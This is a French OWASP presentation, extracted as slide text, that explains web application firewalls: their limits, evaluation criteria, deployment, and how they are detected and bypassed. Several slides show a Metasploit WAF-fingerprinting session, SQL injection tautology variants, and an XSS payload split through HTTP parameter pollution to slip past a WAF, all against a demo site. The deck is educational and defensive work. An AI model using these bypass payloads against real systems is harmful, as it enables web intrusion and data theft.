  • 38. Réalités du WAF Patcher virtuellement les problèmes Plus ou moins efficace suivant la méthode employée (positive, négative) Cacher tout ou partie de l’infrastructure En mode reverse proxy Analyseur de trafic HTTP/HTTPS/XML puissant Grace à ses fonctions de normalisation et son reporting
  • 39. Mythes du WAF C’est un nouvel élément d’infrastructure Couts supplémentaires, à intégrer en PCA, … Compétence supplémentaire… Source de problèmes récurrents : Modèle positif : à chaque modification de l’applicatif Modèle négatif : dépendant des mises a jours. Complexifie le debug Ce n’est pas la solution! Il « laisse » passer des failles (Session Hijacking, élévation de privilèges, HTTP responsesplitting, …) Il n’est pas (encore) obligatoire en PCI-DSS !
  • 40. Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
  • 41. WAF – En ai-je besoin ? Boite Noire Elevé Majoritairement développé en externe, peu de sources disponibles Bénéfice d’un WAF Majoritairement développé en interne, disponibilité des sources Moyen Accès total aux sources, et aux développeurs Faible Aucun Total Partiel Accès aux sources de l’application
  • 42. Web Application Firewall Evaluation Criteria (WAFEC) Projet du Web Application Security Consortium http://www.webappsec.org/projects/wafec/ Liste les fonctionnalités possibles d’un WAF et non les fonctions minimum nécessaires d’un WAF Permet d’évaluer techniquement le meilleur WAF pour son environnement en fonction de 9 critères : Type d’architecture à déployer (pont, reverse-proxy, intégré, SSL, …) Support d’HTTP et d’HTML (Versions, encodages,…) Techniques de détection (signatures, techniques de normalisation du trafic, …) Techniques de protection (brute force, cookies, sessions, …) Journalisation (intégration NSM, type de logs, gestion des données sensibles, …) Rapports (types de rapports, distribution, format, …) Administration (politiques, logs, …) Performance (nb de connexions/s, latences, …) Support XML (WS-i intégration, validation XML/RPC, …)
  • 43. WAF – Mise en place Choisir le type (centralisé, décentralisé, performances, …) => Projet WAFEC Mettre en place l’organisation Désigner (au minimum) un « WAF  operation manager » en lien avec les équipes infrastructures et développement. Rôle technico-MOA Mettre en place la protection minimale XSS, Blind-SQLi, … Définir les priorités des applications à protéger Itérer Traçage des requêtes Mise en place de la protection Contrôle de l’effectivité de la protection.
  • 44. WAF – OWASP Top10 – Mise en Place
  • 45. WAF – OWASP Top10 – Mise en Place
  • 46. Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
  • 47. Détection des WAFs Certains WAFs laissent beaucoup d’informations sur leur présence : Cookies : barra_counter_session, NCI__SessionId, WODSESSION Headers Server=profense Server=BinarySec Réponses a des attaques (trigger de blacklist) dans les headers HTTP/1.1 200 Condition Intercepted HTTP/1.1 200 Forbidden HTTP/1.1. 407 Proxy AuthenticationRequired Ou les pages par défaut !!! <h1>System error!<hr></h1> <title>Action not authorized!</title> ……
  • 48. Détection des WAFs Wafw00f présenté à l’AppSec EU 2009. Script python se basant sur une base de détection interne. Waffun présenté à l’AppSec EU 2009 Script python de fuzzing pour construire une liste de bypass du WAF.
  • 49. Détection des WAFs ./msfconsole [-] *** [-] *** # # ###### ##### ## #### ##### # #### # ##### ## ## # # # # # # # # # # # # # ## # ##### # # # #### # # # # # # # # # # # ###### # ##### # # # # # # # # # # # # # # # # # # # # # ###### # # # #### # ###### #### # # =[ msf v3.3-dev + -- --=[ 396 exploits - 239 payloads + -- --=[ 20 encoders - 7 nops =[ 267 aux msf > use auxiliary/scanner/http/wimps msfauxiliary(wimps) > set XSSVECTOR /Users/eagle/.msf3/modules/auxiliary/scanner/http/xssvector.txt XSSVECTOR => /Users/eagle/.msf3/modules/auxiliary/scanner/http/xssvector.txt msfauxiliary(wimps) > set RPORT 443 RPORT => 443 msfauxiliary(wimps) > set SSL true SSL => true msfauxiliary(wimps) > set RHOST www.wafforwimps.org RHOST => www.wafforwimps.org msfauxiliary(wimps) > run [*] LoadingDatabase [*] Testing ./<script>alert(XSS)</script> Foundsome WAF signature ./<body onload=‘’http://www.wafforwinps.org/hack.js’’ > Foundsome WAF signature ……….
  • 50. Bypass des WAFs Un WAFs sera toujours bypassé s’il n’implémente pas le modèle positif. Toute tentative de : Blacklist Règle de type regular-expression Réseau neuronal Sera inefficace!
  • 51.
  • 52. Bypass des WAFs Et l’on ne parle par du reste (SQL-i, HPP, …) Prenons la chaine a 130 millions OR 1==1 ID=1%20OR%201==1 ID=1%20OR%200x01==0x01 ID=1%20OR%2042==42 ID=1&ID=%20OR%20&ID=1&ID=%3&ID=d&ID=%3&ID=d&1 Tout ceci est valide et équivalent
  • 53. Bypass des WAFs – le coup de la pollution des paramètres ncat--sslwww.wafforwimps.org 443 GET /test.aspx?val=<script>alert(Falken);</script> HTTP/1.0 HTTP/1.1 407 Proxy AuthenticationRequired Date: Thu, 03 Sep 2009 3:47:19 GMT Server: IIS Last-Modified: Mon, 28 Jul 2008 14:45:31 GMT Accept-Ranges: bytes Content-Type: text/html Via: 1.1 www.wafforwimps.org X-Cache: MISS fromwww.wafforwimps.org Connection: close <html> <head><title>System error!</title></head> <body bgcolor=#FFFFFF> <h1>System error!<hr></h1> <p> Error #<b>3</b>...
  • 54. Bypass des WAFs – le coup de la pollution des paramètres ncat--sslwww.wafforwimps.org 443 GET /test.aspx?val=<&val=script&val=>&val=alert&val=(&val=Fal&val=K&val=en&val=) &val=; &val=<&val=/&val=script&val=> HTTP/1.0 HTTP/1.1 200 Ok Date: Thu, 03 Sep 2009 4:47:19 GMT Server: IIS Last-Modified: Mon, 28 Jul 2008 14:45:31 GMT Accept-Ranges: bytes Content-Type: text/html Via: 1.1 www.wafforwimps.org X-Cache: MISS fromwww.wafforwimps.org Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr"> <head> <metahttp-equiv="Content-Type" content="text/html; charset=UTF-8" /> <metaname="ROBOTS" content="INDEX, FOLLOW" /> </head> <body > Hello Professor <script>alert(XSS);</script>, Wouldyouplay a game? </body>
  • 55. Exemple vécu del’(in)utilité recyclage déploiement d’un WAF Société de type VPC sur un marché de niche en B2B.
  • 56. 1ere étape : le choix 2 options (via PCI-DSS 6.6, car il est bien connu que toute société qui vend sur internet se doit d’être conforme….) : Déployer un WAF + Scan automatisés Mettre en place un code review sécurité + SDLC Solution choisie : déployer un WAF(redondé) + Scans en mode ASP récurrent (1 par mois au minimum) => Magic quadrant + idée des conseils en régie + promo de Noël…
  • 57. 2ème étape : la vie du produit Résultats des scans réguliers : Tout est vert (forcément il y a un WAF qui voit arriver avec ses gros sabots le robot….) Configuration du WAF : Configuration faite par l’ingénieur en charge des Firewalls (normal, c’est un Web Application FIREWALL !) Remontée des logs dans un fichier (non analysés, car trop d’alertes) Règles parfois permissibles car des outils (type CMS plus ou moins propriétaires génèrent des requêtes bloquées)
  • 58. L’attaque Un lutin malveillant lance une DOS (type slowloris) à destination du WAF en mode fail-open. Pendant ce temps, le lutin malveillant découvre une injection SQL basique (très très basique => type ‘OR 1==1). les bases sont téléchargées par le lutin malveillant. Le lutin revend tout ou partie de la base au meilleur offreur. Le lutin peut continuer à boire ses Guinness.
  • 59.
  • 60. Le bénéfice +100% de bénéfice(financier) pour le vendeur du PC de la webcam de la machine a caféWAF +100% de bénéfice(financier) pour le vendeur du scanner tout va bien quand je remets le rapport au DSIASP -424,2%(au minimum) pour l’entreprise : Perte d’image de marque Perte de l’agrément PCI-DSS (amendes ?) Pentests manuels en urgence Formation des développeurs en urgence Revue de code en urgence
  • 61. Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
  • 62. Pas de recette Miracle Mettre en place un cycle de développementsécurisé ! Auditer et Tester son code ! Vérifier le fonctionnement de son Application ! La sécurité est d’abord et avant tout affaire de bon sens.
  • 63. Rejoignez nous ! http://www.owasp.fr 42